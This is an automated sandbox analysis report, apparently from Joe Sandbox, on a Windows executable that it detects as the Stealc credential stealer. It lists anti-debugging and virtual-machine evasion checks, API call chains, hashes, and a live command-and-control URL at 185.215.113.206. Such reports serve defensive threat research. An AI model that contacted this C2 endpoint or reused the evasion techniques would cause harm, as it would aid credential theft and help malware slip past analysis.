              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00C823A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,2_2_00C823A9
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00C84B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,2_2_00C84B10
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00C84B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,2_2_00C84B29
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00C8DD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,2_2_00C8DD30
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00C8D530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,2_2_00C8D530
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00C716A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,2_2_00C716A0
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00C716B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,2_2_00C716B9
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00C91BF0 lstrcpy,ExitProcess,GetSystemInfo,ExitProcess,GetUserDefaultLangID,ExitProcess,ExitProcess,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,CloseHandle,ExitProcess,2_2_00C91BF0
              Source: file.exe, file.exe, 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000002.00000002.1375818515.00000000017C4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH~
              Source: file.exe, 00000002.00000002.1375818515.00000000017F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000002.00000002.1375818515.000000000177E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
              Source: file.exe, 00000002.00000002.1375818515.000000000177E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwareV
              Source: file.exe, 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_2-25886
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_2-25877
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_2-25731
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_2-25750
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_2-25898
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Hides threads from debuggers
              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
              Tries to detect sandboxes and other dynamic analysis tools (window names)
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00C74A60 VirtualProtect 00000000,00000004,00000100,?2_2_00C74A60
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00C96390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00C96390
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00C96390 mov eax, dword ptr fs:[00000030h]2_2_00C96390
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00C92AD0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,2_2_00C92AD0
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Yara detected Powershell download and execute
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 7044, type: MEMORYSTR
              Searches for specific processes (likely to inject)
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00C946A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,2_2_00C946A0
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00C94610 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle,2_2_00C94610
              Source: file.exe, file.exe, 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: CProgram Manager
              Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,2_2_00C92D60
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00C92B60 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,2_2_00C92B60
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00C92A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,2_2_00C92A40
              Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00C92C10 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,2_2_00C92C10

              Stealing of Sensitive Information

              barindex
              Yara detected Stealc
              Source: Yara matchFile source: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.1375818515.000000000179D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.1278149370.00000000055A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 7044, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP

              Remote Access Functionality

              barindex
              Yara detected Stealc
              Source: Yara matchFile source: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.1375818515.000000000179D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.1278149370.00000000055A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 7044, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Command and Scripting Interpreter              		1
              Create Account              		11
              Process Injection              		1
              Masquerading              		OS Credential Dumping2
              System Time Discovery              		Remote Services1
              Archive Collected Data              		2
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts13
              Native API              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		33
              Virtualization/Sandbox Evasion              		LSASS Memory641
              Security Software Discovery              		Remote Desktop ProtocolData from Removable Media2
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
              Disable or Modify Tools              		Security Account Manager33
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
              Process Injection              		NTDS13
              Process Discovery              		Distributed Component Object ModelInput Capture12
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information              		LSA Secrets1
              Account Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
              Obfuscated Files or Information              		Cached Domain Credentials1
              System Owner/User Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
              Software Packing              		DCSync1
              File and Directory Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading              		Proc Filesystem324
              System Information Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              file.exe45%ReversingLabsWin32.Trojan.Generic
              file.exe54%VirustotalBrowse
              file.exe100%AviraTR/Crypt.TPM.Gen
              file.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://185.215.113.2062?0%Avira URL Cloudsafe
              http://185.215.113.206/c4becf79229cb002.php/F100%Avira URL Cloudmalware
              http://185.215.113.206/c4becf79229cb002.php/F19%VirustotalBrowse

              Domains and IPs

              Contacted Domains

              No contacted domains info

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://185.215.113.206/c4becf79229cb002.phpfalse
                		high
                http://185.215.113.206/false
                  		high

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://185.215.113.206/c4becf79229cb002.phplfile.exe, 00000002.00000002.1375818515.00000000017DA000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    http://185.215.113.206/c4becf79229cb002.php/Ffile.exe, 00000002.00000002.1375818515.00000000017DA000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 19%, Virustotal, Browse
                    • Avira URL Cloud: malware
                    		unknown
                    http://185.215.113.206/c4becf79229cb002.php?file.exe, 00000002.00000002.1375818515.00000000017C4000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      http://185.215.113.206/c4becf79229cb002.php0file.exe, 00000002.00000002.1375818515.00000000017DA000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://185.215.113.206/Mfile.exe, 00000002.00000002.1375818515.00000000017DA000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          http://185.215.113.206file.exe, 00000002.00000002.1375818515.000000000177E000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://185.215.113.2062?file.exe, 00000002.00000002.1375818515.000000000177E000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://185.215.113.206/c4becf79229cb002.phpDfile.exe, 00000002.00000002.1375818515.00000000017DA000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              185.215.113.206
                              		unknownPortugal
                              		206894WHOLESALECONNECTIONSNLtrue

                              General Information

                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1560648
                              Start date and time:2024-11-22 04:26:10 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 5m 12s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:13
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:file.exe
                              Detection:MAL
                              Classification:mal100.troj.evad.winEXE@1/0@0/1
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 79%
                              • Number of executed functions: 19
                              • Number of non-executed functions: 117
                              Cookbook Comments:
                              • Found application associated with file extension: .exe

                              Warnings

                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                              • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size getting too big, too many NtQueryValueKey calls found.

                              Simulations

                              Behavior and APIs

                              No simulations

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              185.215.113.206file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                              • 185.215.113.206/68b591d6548ec281/sqlite3.dll
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php

                              Domains

                              No context

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousLummaCBrowse
                              • 185.215.113.16
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousLummaCBrowse
                              • 185.215.113.16
                              file.exeGet hashmaliciousLummaCBrowse
                              • 185.215.113.16

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              No created / dropped files found

                              Static File Info

                              General

                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):7.94336351253114
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.96%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:file.exe
                              File size:1'731'584 bytes
                              MD5:e26b7b214a9bcdada5b6a91ced4f99b3
                              SHA1:092b5406ba5d33ebd2f40fb8ccbd9e191fb3a845
                              SHA256:0fcf04a856f1a43c977d633e19138fe8736482425557a16ea02e7572d2d6d313
                              SHA512:83b4713584b23fc879f7b079bdaa43ea900fded8a2bec2d0cc1b505de7101d706826056dd0e0bbd521c1ca6fd29b33e8e8a7bd42ffbc423dec3f2f7328b9f502
                              SSDEEP:49152:Vo3Ip876qfaZ5auoQOwubB5QgwR5BPB44:C3N76iBbB5Q15D
                              TLSH:1C85330C7653F34BC39F4C340AAF5C4673DF68D275A5AAF10D925A32526306AB4BEC1A
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..

                              File Icon

                              Icon Hash:00928e8e8686b000

                              Static PE Info

                              General

                              Entrypoint:0xa64000
                              Entrypoint Section:.taggant
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                              Time Stamp:0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:5
                              OS Version Minor:1
                              File Version Major:5
                              File Version Minor:1
                              Subsystem Version Major:5
                              Subsystem Version Minor:1
                              Import Hash:2eabe9054cad5152567f0699947a2c5b

                              Entrypoint Preview

                              Instruction
                              jmp 00007FAE5883B37Ah
                              cmovp ebx, dword ptr [edx]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add cl, ch
                              add byte ptr [eax], ah
                              add byte ptr [eax], al
                              add byte ptr [ecx], al
                              or al, byte ptr [eax]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], dh
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [edx], ah
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [ecx], al
                              add byte ptr [eax], 00000000h
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              adc byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              or ecx, dword ptr [edx]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al

                              Rich Headers

                              Programming Language:
                              • [C++] VS2010 build 30319
                              • [ASM] VS2010 build 30319
                              • [ C ] VS2010 build 30319
                              • [ C ] VS2008 SP1 build 30729
                              • [IMP] VS2008 SP1 build 30729
                              • [LNK] VS2010 build 30319

                              Data Directories

                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0x24b04d0x61.idata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x24a0000x1ac.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x24b1f80x8.idata
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                              Sections

                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              0x10000x2490000x16200221664aef12d75aba278a99b6261d0ebunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .rsrc0x24a0000x1ac0x200521970f31b879e846510786ca04e27d3False0.58203125data4.543958829285356IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .idata 0x24b0000x10000x2000d0399d83a742d5d86c5718841e8e842False0.134765625data0.8646718654202081IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              0x24c0000x28a0000x200f4942b5267648fd2c5df6718a616d8eaunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              yqttidiy0x4d60000x18d0000x18cc009c778460257297348325a9aaba7958b8False0.9948113579080026data7.953903563847724IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              gxgxfcij0x6630000x10000x60097a34929d6c889816d19352d895bf0efFalse0.5950520833333334data5.1421198073273136IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .taggant0x6640000x30000x2200f84eb0596b6a43990f21370b69abd3ffFalse0.046185661764705885DOS executable (COM)0.4540847547322878IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                              Resources

                              NameRVASizeTypeLanguageCountryZLIB Complexity
                              RT_MANIFEST0x662a540x152ASCII text, with CRLF line terminators0.6479289940828402

                              Imports

                              DLLImport
                              kernel32.dlllstrcpy

                              Network Behavior

                              Suricata IDS Alerts

                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                              2024-11-22T04:27:16.663705+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.749700185.215.113.20680TCP

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Nov 22, 2024 04:27:14.612890005 CET4970080192.168.2.7185.215.113.206
                              Nov 22, 2024 04:27:14.732428074 CET8049700185.215.113.206192.168.2.7
                              Nov 22, 2024 04:27:14.732568979 CET4970080192.168.2.7185.215.113.206
                              Nov 22, 2024 04:27:14.733470917 CET4970080192.168.2.7185.215.113.206
                              Nov 22, 2024 04:27:14.852879047 CET8049700185.215.113.206192.168.2.7
                              Nov 22, 2024 04:27:16.118921041 CET8049700185.215.113.206192.168.2.7
                              Nov 22, 2024 04:27:16.118999004 CET4970080192.168.2.7185.215.113.206
